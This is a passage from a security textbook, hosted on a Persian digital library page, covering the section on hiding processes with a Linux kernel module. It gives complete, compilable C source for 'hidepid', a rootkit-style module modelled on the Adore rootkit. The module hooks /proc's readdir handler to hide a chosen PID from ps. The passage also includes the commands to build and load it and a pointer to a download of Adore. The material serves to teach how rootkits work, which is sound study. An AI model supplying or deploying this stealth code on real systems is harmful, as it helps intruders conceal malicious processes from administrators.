Network.Security.Tools [Electronic resources] نسخه متنی

اینجــــا یک کتابخانه دیجیتالی است

با بیش از 100000 منبع الکترونیکی رایگان به زبان فارسی ، عربی و انگلیسی

جستجو بر اساس ... همه عنوان پدیدآور موضوع یادداشت تمام متن
اصطلاحنامه مجموعه ها مرورالفبایی لغت نامه دهخدا
جستجو در لغت نامه
بیشتر
کتابخانه شخصی پرسش از کتابدار ارسال منبع

Network.Security.Tools [Electronic resources] - نسخه متنی

| نمايش فراداده ، افزودن یک نقد و بررسی
افزودن به کتابخانه شخصی
میخواهم بخوانم
درحال خواندن
خوانده شده
ارسال به دوستان

آدرس پست الکترونیک گیرنده :

آدرس پست الکترونیک فرستنده :

نام و نام خانوارگی فرستنده :

پیغام برای گیرنده ( حداکثر 250 حرف ) :

کد امنیتی را وارد نمایید

ارسال
جستجو در متن کتاب
بیشتر
تنظیمات قلم

فونت

اندازه قلم

+ - پیش فرض

حالت نمایش

روز نیمروز شب
جستجو در لغت نامه
بیشتر
لیست موضوعات

Sitemap

Table of Contents

Copyright

Preface

Audience

Assumptions This Book Makes

Contents of This Book

Conventions Used in This Book

Using Code Examples

We'd Like to Hear from You

Safari Enabled

Acknowledgments

Part I: Modifying and Hacking Security Tools

Chapter 1. Writing Plug-ins for Nessus

Section 1.1. The Nessus Architecture

Section 1.2. Installing Nessus

Section 1.3. Using Nessus

Section 1.4. The NASL Interpreter

Section 1.5. Hello World

Section 1.6. Datatypes and Variables

Section 1.7. Operators

Section 1.8. if...else

Section 1.9. Loops

Section 1.10. Functions

Section 1.11. Predefined Global Variables

Section 1.12. Important NASL Functions

Section 1.13. Nessus Plug-ins

Chapter 2. Developing Dissectors and Plug-ins for the Ettercap Network Sniffer

Section 2.1. Installing and Using Ettercap

Section 2.2. Writing an Ettercap Dissector

Section 2.3. Writing an Ettercap Plug-in

Chapter 3. Extending Hydra and Nmap

Section 3.1. Extending Hydra

Section 3.2. Adding Service Signatures to Nmap

Chapter 4. Writing Plug-ins for the Nikto Vulnerability Scanner

Section 4.1. Installing Nikto

Section 4.2. Using Nikto

Section 4.3. Nikto Under the Hood

Section 4.4. Existing Nikto Plug-ins

Section 4.5. Adding Custom Entries to the Plug-in Databases

Section 4.6. Using LibWhisker

Section 4.7. Writing an NTLM Plug-in for Brute-Force Testing

Section 4.8. Writing a Standalone Plug-in to Attack Lotus Domino

Chapter 5. Writing Modules for the Metasploit Framework

Section 5.1. Introduction to MSF

Section 5.2. Overview of Stack Buffer Overflows

Section 5.3. Writing Exploits for MSF

Section 5.4. Writing a Module for the MnoGoSearch Overflow

Section 5.5. Writing an Operating System Fingerprinting Module for MSF

Chapter 6. Extending Code Analysis to the Webroot

Section 6.1. Attacking Web Applications at the Source

Section 6.2. Toolkit 101

Section 6.3. PMD

Section 6.4. Extending PMD

Part II: Modifying and Hacking Security Tools

Chapter 7. Fun with Linux Kernel Modules

Section 7.1. Hello World

Section 7.2. Intercepting System Calls

Section 7.3. Hiding Processes

Section 7.4. Hiding from netstat

Chapter 8. Developing Web Assessment Tools and Scripts

Section 8.1. Web Application Environment

Section 8.2. Designing the Scanner

Section 8.3. Building the Log Parser

Section 8.4. Building the Scanner

Section 8.5. Using the Scanner

Section 8.6. Complete Source Code

Chapter 9. Automated Exploit Tools

Section 9.1. SQL Injection Exploits

Section 9.2. The Exploit Scanner

Section 9.3. Using the Scanner

Chapter 10. Writing Network Sniffers

Section 10.1. Introduction to libpcap

Section 10.2. Getting Started with libpcap

Section 10.3. libpcap and 802.11 Wireless Networks

Section 10.4. libpcap and Perl

Section 10.5. libpcap Library Reference

Chapter 11. Writing Packet-Injection Tools

Section 11.1. Introduction to libnet

Section 11.2. Getting Started with libnet

Section 11.3. Advanced libnet Functions

Section 11.4. Combining libnet and libpcap

Section 11.5. Introducing AirJack

Colophon

توضیحات
افزودن یادداشت جدید









7.3. Hiding Processes



Adore

is a popular LKM-based
rootkit. Among its many features, it allows a user to hide processes
by altering the /proc system's
readdir handler.



Download the Adore rootkit at http://packetstormsecurity.nl/groups/teso/.


The /proc system stores a lot of system
information, including process information. For example,
let's assume sshd is running on
our system. You can use the
ps
tool to obtain
sshd's Process ID (PID):


[notroot]$ ps x | grep sshd
1431 ?       S    0:00 /usr/sbin/sshd
4721 tty1    S    0:00 grep sshd


In our example, the sshd
process's PID is 1431. Let's look
in /proc/1431 to obtain more information about
the sshd process:


[notroot]$ ls -l /proc/1431/
total 0
-r--------    1 root     root            0 Sep  4 09:14 auxv
-r--r--r--    1 root     root            0 Sep  4 09:12 cmdline
lrwxrwxrwx    1 root     root            0 Sep  4 09:14 cwd -> /
-r--------    1 root     root            0 Sep  4 09:12 environ
lrwxrwxrwx    1 root     root            0 Sep  4 09:14 exe -> /usr/sbin/sshd
dr-x------    2 root     root            0 Sep  4 09:14 fd
-r--r--r--    1 root     root            0 Sep  4 09:14 maps
-rw-------    1 root     root            0 Sep  4 09:14 mem
-r--r--r--    1 root     root            0 Sep  4 09:14 mounts
lrwxrwxrwx    1 root     root            0 Sep  4 09:14 root -> /
-r--r--r--    1 root     root            0 Sep  4 09:12 stat
-r--r--r--    1 root     root            0 Sep  4 09:14 statm
-r--r--r--    1 root     root            0 Sep  4 09:12 status
dr-xr-xr-x    3 root     root            0 Sep  4 09:14 task
-r--r--r--    1 root     root            0 Sep  4 09:14 wchan


As you can see, the /proc filesystem also stores
process information. The ps tool uses the
/proc system to enumerate the processes running
on a system.


In this section, we will use Adore's techniques to
hide a given process with an LKM that we will call
hidepid. For example, let's
create a simple process we want to hide:


[notroot]$ sleep 999999 &
[1] 4781


From the preceding sleep command, we know process
4781 will be available for 999,999 seconds, so we will attempt to
hide this process.


The hide_pid( ) function in
hidepid.c expects a pointer to
/proc's original
readdir handler, as well as the new
readdir handler. First, the function attempts to
obtain a file descriptor by attempting to open
/proc:


if((filep = filp_open("/proc",O_RDONLY,0))==NULL)
return -1;


The pointer to /proc's
readdir handler is stored so we can restore it
before the LKM exits:


if(orig_readdir)
*orig_readdir = filep->f_op->readdir;


Next, /proc's
readdir handler is set to
new_readdir:


filep->f_op->readdir=new_readdir;


The hide_pid( ) function is invoked with the
following parameters upon initialization:


hide_pid(&orig_proc_readdir,my_proc_readdir);


Because my_proc_readdir is passed as the second
parameter to hide_pid( ), which corresponds with
new_readdir, the LKM sets
/proc's
readdir handler to
my_proc_readdir. The my_proc_readdir(
) function invokes the original_proc_readdir() function but with my_proc_filldir as
the handler. The my_proc_filldir( ) function
simply checks if the name of the PID being read from
/proc is the same as the name of the PID we are
trying to hide. If it is, the function simply returns. Otherwise, it
calls the original filldir( ):


if(adore_atoi(name)==HIDEPID)
return 0;
return proc_filldir(buf, name, nlen, off, ino, x);


When the LKM is unloaded, restore( ) is invoked to
reset /proc's
readdir handler:


if ((filep = filp_open("/proc", O_RDONLY, 0)) == NULL)
return -1;
filep->f_op->readdir = orig_readdir;



7.3.1. hidepid.c



Following is the full source code of our
hidepid LKM:


/*Thanks to adore-ng from Stealth for the ideas used in this code*/
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <net/sock.h>
#define HIDEPID 4781
typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_proc_readdir=NULL;
filldir_t proc_filldir = NULL;
/*Convert string to integer. Strip non-integer characters. Courtesy
adore-ng*/
int adore_atoi(const char *str)
{
int ret = 0, mul = 1;
const char *ptr;
for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++)
;
ptr--;
while (ptr >= str) {
if (*ptr < '0' || *ptr > '9')
break;
ret += (*ptr - '0') * mul;
mul *= 10;
ptr--;   
}
return ret;
}
int my_proc_filldir (void *buf, const char *name, int nlen, loff_t off,
ino_t ino, unsigned x)
{
/*If name is equal to our pid, then we return 0. This way,
our pid isn't visible*/
if(adore_atoi(name)==HIDEPID)
{
return 0;
}
/*Otherwise, call original filldir*/
return proc_filldir(buf, name, nlen, off, ino, x);
}
int my_proc_readdir(struct file *fp, void *buf, filldir_t filldir)
{
int r=0;
proc_filldir = filldir;
/*invoke orig_proc_readdir with my_proc_filldir*/
r=orig_proc_readdir(fp,buf,my_proc_filldir);
return r;
}
int hide_pid(readdir_t *orig_readdir, readdir_t new_readdir)
{
struct file *filep;
/*open /proc */
if((filep = filp_open("/proc",O_RDONLY,0))==NULL)
{
return -1;
}
/*store proc's readdir*/
if(orig_readdir)
*orig_readdir = filep->f_op->readdir;
/*set proc's readdir to new_readdir*/
filep->f_op->readdir=new_readdir;
filp_close(filep,0);
return 0;
}
/*restore /proc's readdir*/
int restore (readdir_t orig_readdir)
{
struct file *filep;
/*open /proc */
if ((filep = filp_open("/proc", O_RDONLY, 0)) == NULL) {
return -1;
}
/*restore /proc's readdir*/
filep->f_op->readdir = orig_readdir;
filp_close(filep, 0);
return 0;
}
static int __init myinit(void)  
{
hide_pid(&orig_proc_readdir,my_proc_readdir);
return 0;
}
static void myexit(void)
{
restore(orig_proc_readdir);
}
module_init(myinit);
module_exit(myexit);
MODULE_LICENSE("GPL");



7.3.2. Compiling and Testing hidepid



To test the module, use the following makefile:


obj-m += hidepid.o


Compile using the following make command:


[notroot]$ make -C /usr/src/linux-`uname -r` SUBDIRS=$PWD modules


Test the module by executing ps to list the
sleep process we initiated earlier:


[notroot]$ ps a | grep 4781
4781 tty1  S      0:00 sleep 999999
6545 tty1  R      0:00 grep 4781


Insert the module:


[root]# insmod ./hidepid.ko


Now, the sleep process is no longer visible:


[notroot]$ ps a | grep 4781
6545 tty1  R      0:00 grep 4781


Remember to remove the module when
done: 


[root]# rmmod hidepid



/ 85